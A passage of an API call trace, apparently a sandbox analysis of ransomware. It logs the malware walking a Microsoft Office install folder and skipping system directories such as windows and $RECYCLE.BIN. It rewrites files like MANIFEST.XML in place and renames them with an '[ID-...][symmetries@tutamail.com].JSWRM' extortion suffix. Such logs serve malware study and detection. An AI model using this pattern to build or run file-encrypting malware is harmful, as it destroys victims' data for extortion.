[0134.796] lstrcmpiW (lpString1="lyncDesktopViewModel.dll", lpString2="$RECYCLE.BIN") returned 1 [0134.796] lstrcmpiW (lpString1="lyncDesktopViewModel.dll", lpString2="system volume information") returned -1 [0134.796] lstrcmpiW (lpString1="lyncDesktopViewModel.dll", lpString2="msocache") returned -1 [0134.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lyncDesktopViewModel.dll", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0134.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lyncDesktopViewModel.dll", cchWideChar=24, lpMultiByteStr=0x240f20, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lyncDesktopViewModel.dll", lpUsedDefaultChar=0x0) returned 24 [0134.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lyncDesktopViewModel.dll", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0134.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lyncDesktopViewModel.dll", cchWideChar=24, lpMultiByteStr=0x241330, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lyncDesktopViewModel.dll", lpUsedDefaultChar=0x0) returned 24 [0134.797] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed041918, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xef9884bb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd68243, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb73240, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="lynchtmlconv.exe", cAlternateFileName="LYNCHT~1.EXE")) returned 1 [0134.797] lstrcmpiW (lpString1="lynchtmlconv.exe", lpString2=".") returned 1 [0134.797] lstrcmpiW (lpString1="lynchtmlconv.exe", lpString2="..") returned 1 [0134.797] lstrcmpiW (lpString1="lynchtmlconv.exe", lpString2="...") returned 1 [0134.797] lstrcmpiW (lpString1="lynchtmlconv.exe", lpString2="windows") returned -1 [0134.797] lstrcmpiW (lpString1="lynchtmlconv.exe", lpString2="recovery") returned -1 [0134.797] lstrcmpiW (lpString1="lynchtmlconv.exe", lpString2="perflogs") returned -1 [0134.797] lstrcmpiW (lpString1="lynchtmlconv.exe", lpString2="documents and settings") returned 1 [0134.797] lstrcmpiW (lpString1="lynchtmlconv.exe", lpString2="$RECYCLE.BIN") returned 1 [0134.797] lstrcmpiW (lpString1="lynchtmlconv.exe", lpString2="system volume information") returned -1 [0134.797] lstrcmpiW (lpString1="lynchtmlconv.exe", lpString2="msocache") returned -1 [0134.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lynchtmlconv.exe", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0134.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lynchtmlconv.exe", cchWideChar=16, lpMultiByteStr=0x241268, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lynchtmlconv.exe", lpUsedDefaultChar=0x0) returned 16 [0134.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lynchtmlconv.exe", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0134.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lynchtmlconv.exe", cchWideChar=16, lpMultiByteStr=0x241178, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lynchtmlconv.exe", lpUsedDefaultChar=0x0) returned 16 [0134.797] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcce034a4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcce034a4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcce034a4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8640, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="lynchtmlconvpxy.dll", cAlternateFileName="LYNCHT~1.DLL")) returned 1 [0134.797] lstrcmpiW (lpString1="lynchtmlconvpxy.dll", lpString2=".") returned 1 [0134.797] lstrcmpiW (lpString1="lynchtmlconvpxy.dll", lpString2="..") returned 1 [0134.797] lstrcmpiW (lpString1="lynchtmlconvpxy.dll", lpString2="...") returned 1 [0134.797] lstrcmpiW (lpString1="lynchtmlconvpxy.dll", lpString2="windows") returned -1 [0134.797] lstrcmpiW (lpString1="lynchtmlconvpxy.dll", lpString2="recovery") returned -1 [0134.797] lstrcmpiW (lpString1="lynchtmlconvpxy.dll", lpString2="perflogs") returned -1 [0134.797] lstrcmpiW (lpString1="lynchtmlconvpxy.dll", lpString2="documents and settings") returned 1 [0134.797] lstrcmpiW (lpString1="lynchtmlconvpxy.dll", lpString2="$RECYCLE.BIN") returned 1 [0134.797] lstrcmpiW (lpString1="lynchtmlconvpxy.dll", lpString2="system volume information") returned -1 [0134.797] lstrcmpiW (lpString1="lynchtmlconvpxy.dll", lpString2="msocache") returned -1 [0134.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lynchtmlconvpxy.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0134.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lynchtmlconvpxy.dll", cchWideChar=19, lpMultiByteStr=0x241178, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lynchtmlconvpxy.dll", lpUsedDefaultChar=0x0) returned 19 [0134.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lynchtmlconvpxy.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0134.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lynchtmlconvpxy.dll", cchWideChar=19, lpMultiByteStr=0x241358, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lynchtmlconvpxy.dll", lpUsedDefaultChar=0x0) returned 19 [0134.798] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcce034a4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xde9231af, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdec90856, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x204ea8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="lyncModelProxy.dll", cAlternateFileName="LYNCMO~1.DLL")) returned 1 [0134.798] lstrcmpiW (lpString1="lyncModelProxy.dll", lpString2=".") returned 1 [0134.798] lstrcmpiW (lpString1="lyncModelProxy.dll", lpString2="..") returned 1 [0134.798] lstrcmpiW (lpString1="lyncModelProxy.dll", lpString2="...") returned 1 [0134.798] lstrcmpiW (lpString1="lyncModelProxy.dll", lpString2="windows") returned -1 [0134.798] lstrcmpiW (lpString1="lyncModelProxy.dll", lpString2="recovery") returned -1 [0134.798] lstrcmpiW (lpString1="lyncModelProxy.dll", lpString2="perflogs") returned -1 [0134.798] lstrcmpiW (lpString1="lyncModelProxy.dll", lpString2="documents and settings") returned 1 [0134.798] lstrcmpiW (lpString1="lyncModelProxy.dll", lpString2="$RECYCLE.BIN") returned 1 [0134.798] lstrcmpiW (lpString1="lyncModelProxy.dll", lpString2="system volume information") returned -1 [0134.798] lstrcmpiW (lpString1="lyncModelProxy.dll", lpString2="msocache") returned -1 [0134.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lyncModelProxy.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0134.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lyncModelProxy.dll", cchWideChar=18, lpMultiByteStr=0x240fe8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lyncModelProxy.dll", lpUsedDefaultChar=0x0) returned 18 [0134.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lyncModelProxy.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0134.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lyncModelProxy.dll", cchWideChar=18, lpMultiByteStr=0x2410d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lyncModelProxy.dll", lpUsedDefaultChar=0x0) returned 18 [0134.798] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1a8edb08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc88, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MANIFEST.XML", cAlternateFileName="")) returned 1 [0134.798] lstrcmpiW (lpString1="MANIFEST.XML", lpString2=".") returned 1 [0134.798] lstrcmpiW (lpString1="MANIFEST.XML", lpString2="..") returned 1 [0134.798] lstrcmpiW (lpString1="MANIFEST.XML", lpString2="...") returned 1 [0134.798] lstrcmpiW (lpString1="MANIFEST.XML", lpString2="windows") returned -1 [0134.798] lstrcmpiW (lpString1="MANIFEST.XML", lpString2="recovery") returned -1 [0134.798] lstrcmpiW (lpString1="MANIFEST.XML", lpString2="perflogs") returned -1 [0134.798] lstrcmpiW (lpString1="MANIFEST.XML", lpString2="documents and settings") returned 1 [0134.798] lstrcmpiW (lpString1="MANIFEST.XML", lpString2="$RECYCLE.BIN") returned 1 [0134.798] lstrcmpiW (lpString1="MANIFEST.XML", lpString2="system volume information") returned -1 [0134.798] lstrcmpiW (lpString1="MANIFEST.XML", lpString2="msocache") returned -1 [0134.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MANIFEST.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0134.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MANIFEST.XML", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MANIFEST.XML", lpUsedDefaultChar=0x0) returned 12 [0134.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MANIFEST.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0134.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MANIFEST.XML", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MANIFEST.XML", lpUsedDefaultChar=0x0) returned 12 [0134.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MANIFEST.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\manifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0134.803] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=3208) returned 1 [0134.803] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.803] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0xc80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0xc80, lpOverlapped=0x0) returned 1 [0134.804] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.804] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0xc80, lpOverlapped=0x0) returned 1 [0134.804] CloseHandle (hObject=0x45c) returned 1 [0134.805] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MANIFEST.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\manifest.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MANIFEST.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\manifest.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.806] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1a8edb08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x73880, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MAPIPH.DLL", cAlternateFileName="")) returned 1 [0134.806] lstrcmpiW (lpString1="MAPIPH.DLL", lpString2=".") returned 1 [0134.806] lstrcmpiW (lpString1="MAPIPH.DLL", lpString2="..") returned 1 [0134.806] lstrcmpiW (lpString1="MAPIPH.DLL", lpString2="...") returned 1 [0134.806] lstrcmpiW (lpString1="MAPIPH.DLL", lpString2="windows") returned -1 [0134.806] lstrcmpiW (lpString1="MAPIPH.DLL", lpString2="recovery") returned -1 [0134.806] lstrcmpiW (lpString1="MAPIPH.DLL", lpString2="perflogs") returned -1 [0134.806] lstrcmpiW (lpString1="MAPIPH.DLL", lpString2="documents and settings") returned 1 [0134.806] lstrcmpiW (lpString1="MAPIPH.DLL", lpString2="$RECYCLE.BIN") returned 1 [0134.806] lstrcmpiW (lpString1="MAPIPH.DLL", lpString2="system volume information") returned -1 [0134.806] lstrcmpiW (lpString1="MAPIPH.DLL", lpString2="msocache") returned -1 [0134.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPIPH.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0134.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPIPH.DLL", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MAPIPH.DLL", lpUsedDefaultChar=0x0) returned 10 [0134.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPIPH.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0134.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPIPH.DLL", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MAPIPH.DLL", lpUsedDefaultChar=0x0) returned 10 [0134.806] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc47ce76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x124b0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MAPISHELL.DLL", cAlternateFileName="MAPISH~1.DLL")) returned 1 [0134.806] lstrcmpiW (lpString1="MAPISHELL.DLL", lpString2=".") returned 1 [0134.806] lstrcmpiW (lpString1="MAPISHELL.DLL", lpString2="..") returned 1 [0134.806] lstrcmpiW (lpString1="MAPISHELL.DLL", lpString2="...") returned 1 [0134.806] lstrcmpiW (lpString1="MAPISHELL.DLL", lpString2="windows") returned -1 [0134.806] lstrcmpiW (lpString1="MAPISHELL.DLL", lpString2="recovery") returned -1 [0134.806] lstrcmpiW (lpString1="MAPISHELL.DLL", lpString2="perflogs") returned -1 [0134.806] lstrcmpiW (lpString1="MAPISHELL.DLL", lpString2="documents and settings") returned 1 [0134.806] lstrcmpiW (lpString1="MAPISHELL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0134.806] lstrcmpiW (lpString1="MAPISHELL.DLL", lpString2="system volume information") returned -1 [0134.807] lstrcmpiW (lpString1="MAPISHELL.DLL", lpString2="msocache") returned -1 [0134.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPISHELL.DLL", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0134.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPISHELL.DLL", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MAPISHELL.DLL", lpUsedDefaultChar=0x0) returned 13 [0134.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPISHELL.DLL", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0134.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPISHELL.DLL", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MAPISHELL.DLL", lpUsedDefaultChar=0x0) returned 13 [0134.807] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1a939f30, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f1668, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mce.dll", cAlternateFileName="")) returned 1 [0134.807] lstrcmpiW (lpString1="mce.dll", lpString2=".") returned 1 [0134.807] lstrcmpiW (lpString1="mce.dll", lpString2="..") returned 1 [0134.807] lstrcmpiW (lpString1="mce.dll", lpString2="...") returned 1 [0134.807] lstrcmpiW (lpString1="mce.dll", lpString2="windows") returned -1 [0134.807] lstrcmpiW (lpString1="mce.dll", lpString2="recovery") returned -1 [0134.807] lstrcmpiW (lpString1="mce.dll", lpString2="perflogs") returned -1 [0134.807] lstrcmpiW (lpString1="mce.dll", lpString2="documents and settings") returned 1 [0134.807] lstrcmpiW (lpString1="mce.dll", lpString2="$RECYCLE.BIN") returned 1 [0134.807] lstrcmpiW (lpString1="mce.dll", lpString2="system volume information") returned -1 [0134.807] lstrcmpiW (lpString1="mce.dll", lpString2="msocache") returned -1 [0134.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mce.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0134.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mce.dll", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mce.dll", lpUsedDefaultChar=0x0) returned 7 [0134.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mce.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0134.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mce.dll", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mce.dll", lpUsedDefaultChar=0x0) returned 7 [0134.807] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1a939f30, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4854, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="McePerfCtr.man", cAlternateFileName="MCEPER~1.MAN")) returned 1 [0134.807] lstrcmpiW (lpString1="McePerfCtr.man", lpString2=".") returned 1 [0134.807] lstrcmpiW (lpString1="McePerfCtr.man", lpString2="..") returned 1 [0134.807] lstrcmpiW (lpString1="McePerfCtr.man", lpString2="...") returned 1 [0134.807] lstrcmpiW (lpString1="McePerfCtr.man", lpString2="windows") returned -1 [0134.807] lstrcmpiW (lpString1="McePerfCtr.man", lpString2="recovery") returned -1 [0134.807] lstrcmpiW (lpString1="McePerfCtr.man", lpString2="perflogs") returned -1 [0134.807] lstrcmpiW (lpString1="McePerfCtr.man", lpString2="documents and settings") returned 1 [0134.807] lstrcmpiW (lpString1="McePerfCtr.man", lpString2="$RECYCLE.BIN") returned 1 [0134.807] lstrcmpiW (lpString1="McePerfCtr.man", lpString2="system volume information") returned -1 [0134.807] lstrcmpiW (lpString1="McePerfCtr.man", lpString2="msocache") returned -1 [0134.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="McePerfCtr.man", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0134.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="McePerfCtr.man", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="McePerfCtr.man", lpUsedDefaultChar=0x0) returned 14 [0134.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="McePerfCtr.man", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0134.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="McePerfCtr.man", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="McePerfCtr.man", lpUsedDefaultChar=0x0) returned 14 [0134.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.808] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\McePerfCtr.man" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mceperfctr.man"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0134.808] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=18516) returned 1 [0134.809] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.809] ReadFile (in: hFile=0x45c, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4850, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345ec04*=0x4850, lpOverlapped=0x0) returned 1 [0134.811] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.811] WriteFile (in: hFile=0x45c, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4850, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345ec00*=0x4850, lpOverlapped=0x0) returned 1 [0134.811] CloseHandle (hObject=0x45c) returned 1 [0134.811] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\McePerfCtr.man" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mceperfctr.man"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\McePerfCtr.man.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mceperfctr.man.[id-9a8i36e][symmetries@tutamail.com].jswrm")) 